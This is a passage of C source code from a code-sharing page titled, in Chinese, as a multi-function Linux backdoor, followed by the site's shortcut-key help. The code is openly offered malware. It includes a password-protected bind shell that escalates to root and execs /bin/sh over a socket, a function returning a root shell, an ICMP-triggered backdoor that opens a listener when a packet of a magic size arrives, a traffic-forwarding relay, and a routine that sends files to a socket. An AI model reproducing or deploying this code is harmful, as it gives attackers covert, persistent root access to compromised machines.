📄 一个多功能linux 后门的源代码.txt
字号:
{
i = fread(ret_buf, 1, 32768, f);
if (i == 0) break;
writen_file(fd, ret_buf, i);
}
fclose(f);
exit(0);
}
writen_file(fd, erro, strlen(erro));
close(fd);
exit(-1);
}
/* writen data to socket */
ssize_t writen_file(int fd, const void *vptr, size_t n)
{
size_t nleft;
ssize_t nwritten;
const char *ptr;
ptr = vptr;
nleft = n;
while(nleft > 0)
{
if((nwritten = write(fd, ptr, nleft)) <= 0)
{
if(errno == EINTR)
nwritten = 0;
else
return(-1);
}
nleft -= nwritten;
ptr += nwritten;
}
return(n);
}
/* bind root shell to a port */
int bind_shell(int port)
{
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time;
char passwd[15];
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
struct timeval testtime;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
chdir("/");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(port);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
testtime.tv_sec = TIMEOUT;
testtime.tv_usec = 0;
/*setsockopt(soc_des, SOL_SOCKET, SO_RCVTIMEO, &testtime, sizeof(testtime));*/
alarm(TIMEOUT);
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
alarm(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0)
{
write(soc_cli, GIVEPASS, strlen(GIVEPASS));
recv(soc_cli, passwd, sizeof(passwd), 0);
for (i = 0; i < strlen(passwd); i++)
{
if (passwd[i] == '\n' || passwd[i] == '\r')
{
passwd[i] = '\0';
}
}
if (strcmp(passwd, PASSWORD) != 0)
{
close(soc_cli);
close(soc_rc);
exit(-1);
}
write(soc_cli, MESSAGE, strlen(MESSAGE));
for (i = 0; i < 3; i++)
{
dup2(soc_cli, i);
}
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
close(soc_rc);
exit(1);
}
close(soc_cli);
close(soc_rc);
exit(0);
}
/* return a root shell */
int get_shell(int fd)
{
int i;
setuid(0);
setgid(0);
chdir("/");
write(fd, MESSAGE, strlen(MESSAGE));
for (i = 0; i < 3; i++)
{
dup2(fd, i);
}
execl("/bin/sh","sh",(char *)0);
close(fd);
return 1;
}
/* icmp backdoor */
int icmp_shell()
{
int i, s, size, fromlen, port = ICMP_PORT;
char pkt[4096];
struct protoent *proto;
struct sockaddr_in from;
proto = getprotobyname("icmp");
/* can't creat raw socket */
if((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0)
exit(0);
/* waiting for packets */
while(1)
{
do
{
fromlen = sizeof(from);
if((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *)&from, &fromlen)) < 0)
printf("", size - 28);
}while(size != SIZEPACK + 28);
/* size == SIZEPACK, let's bind the shell on your port :)*/
switch(fork())
{
case -1:
continue;
case 0:
bind_shell(port);
exit (0);
}
}
return 1;
}
/* tran socks code */
int socks(int listenp, char *targeth, int targetp)
{
int listfd, outside, inside, size;
pthread_t thread1;
struct sockaddr_in client;
if(!(listfd = create_socket())) exit(1);
if(!(create_serv(listfd, listenp))) exit(1);
for(;;)
{
size = sizeof(struct sockaddr);
/*printf("waiting for response.........\n");*/
if((outfd = accept(listfd, (struct sockaddr *)&client, &size)) < 0)
{
/*printf("accept error\n");*/
continue;
}
/*printf("accept a client from %s\n", inet_ntoa(client.sin_addr));*/
if(!(infd=create_socket())) exit(1);
if(!(client_connect(infd, targeth, targetp))) quit(outfd, infd, listfd);
maxfd = max(outfd, infd) + 1;
pthread_create(&thread1, NULL, (void *)&out2in, NULL);
}
close(listfd);
}
int create_socket()
{
int sockfd;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0))<0)
{
/*printf("Create socket error\n");*/
return(0);
}
return(sockfd);
}
int create_serv(int sockfd, int port)
{
struct sockaddr_in srvaddr;
bzero(&srvaddr, sizeof(struct sockaddr));
srvaddr.sin_port = htons(port);
srvaddr.sin_family = AF_INET;
srvaddr.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(sockfd, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr))<0)
{
/*printf("Bind to port %d error\n",port);*/
return(0);
}
if(listen(sockfd,CONNECT_NUMBER)<0)
{
/*printf("listen error\n");*/
return(0);
}
return(1);
}
int client_connect(int sockfd, char *server, int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;
if(!(host = gethostbyname(server)))
{
/*printf("gethostbyname error:%s\n",server);*/
return(0);
}
bzero(&cliaddr, sizeof(struct sockaddr));
cliaddr.sin_family = AF_INET;
cliaddr.sin_port = htons(port);
cliaddr.sin_addr = *((struct in_addr *)host->h_addr);
if(connect(sockfd, (struct sockaddr *)&cliaddr, sizeof(struct sockaddr)) < 0)
{
/*printf("connect %s:%d error\n",server,port);*/
return(0);
}
return(1);
}
int quit(int a, int b, int c)
{
close(a);
close(b);
close(c);
exit(1);
}
void out2in()
{
struct timeval timeset;
fd_set readfd, writefd;
int result, i = 0;
char read_in1[MAXSIZE], send_out1[MAXSIZE];
char read_in2[MAXSIZE], send_out2[MAXSIZE];
int read1 = 0, totalread1 = 0, send1=0;
int read2 = 0, totalread2 = 0, send2=0;
int out_fd, in_fd;
out_fd = outfd;
in_fd = infd;
bzero(read_in1, MAXSIZE);
bzero(read_in2, MAXSIZE);
bzero(send_out1, MAXSIZE);
bzero(send_out2, MAXSIZE);
timeset.tv_sec = TIMEOUT;
timeset.tv_usec = 0;
while(1)
{
FD_ZERO(&readfd);
FD_ZERO(&writefd);
FD_SET(out_fd, &readfd);
FD_SET(in_fd, &writefd);
FD_SET(out_fd, &writefd);
FD_SET(in_fd, &readfd);
result = select(maxfd, &readfd, &writefd, NULL, ×et);
if(result < 0)
{
/*printf("select error\n");*/
return;
}
else
if(result == 0)
{
/*printf("time out\n");*/
return;
}
if(FD_ISSET(out_fd, &readfd))
{
read1 = recv(out_fd, read_in1, MAXSIZE, 0);
if(read1 == 0) break;
if(read1 < 0)
{
/*printf("read data error\n");*/
return;
}
memcpy(send_out1 + totalread1, read_in1, read1);
totalread1 += read1;
bzero(read_in1, MAXSIZE);
}
if(FD_ISSET(in_fd, &writefd))
{
while(totalread1 > 0)
{
send1 = write(in_fd, send_out1, totalread1);
if(send1 == 0)break;
if(send1 < 0)
{
/*printf("unknow error\n");*/
continue;
}
totalread1 -= send1;
}
bzero(send_out1, MAXSIZE);
}
if(FD_ISSET(in_fd, &readfd))
{
read2 = recv(in_fd, read_in2, MAXSIZE, 0);
if(read2 == 0) break;
if(read2 < 0)
{
/*printf("read data error\n");*/
return;
}
memcpy(send_out2 + totalread2, read_in2, read2);
totalread2 += read2;
bzero(read_in2, MAXSIZE);
}
if(FD_ISSET(out_fd, &writefd))
{
while(totalread2 > 0)
{
send2 = write(out_fd, send_out2, totalread2);
if(send2 == 0) break;
if(send2 < 0)
{
/*printf("unknow error\n");*/
continue;
}
totalread2 -= send2;
}
bzero(send_out2, MAXSIZE);
}
}
close(out_fd);
close(in_fd);
return;
}
char x2c(char *what)
{
register char digit;
digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0'));
digit *= 16;
digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0'));
return (digit);
}
void unescape_url(char *url)
{
register int x, y;
for(x = 0 , y = 0; url[y]; ++x, ++y)
{
if((url[x] = url[y]) == '%')
{
url[x] = x2c(&url[y + 1]);
y += 2;
}
}
url[x] = '\0';
}
void plustospace(char *str)
{
register int x;
for(x = 0; str[x]; x++)
if (str[x] == '+')
str[x] = ' ';
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -